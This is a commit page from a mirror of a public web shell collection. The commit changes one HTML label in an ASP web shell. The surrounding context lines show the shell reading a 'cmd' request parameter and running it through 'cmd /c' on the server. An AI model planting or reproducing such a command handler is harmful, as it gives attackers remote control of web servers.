mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Fixed label
This commit is contained in:
parent
7e6629ab49
commit
acb55c61bb
1 changed files with 1 additions and 1 deletions
|
@ -39,7 +39,7 @@ end Function
|
|||
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||
</p>
|
||||
<p>
|
||||
<b>The server's software:</b>
|
||||
<b>The server's local address:</b>
|
||||
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||
<% szCMD = request("cmd")
|
||||
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||
|
|
Loading…
Reference in a new issue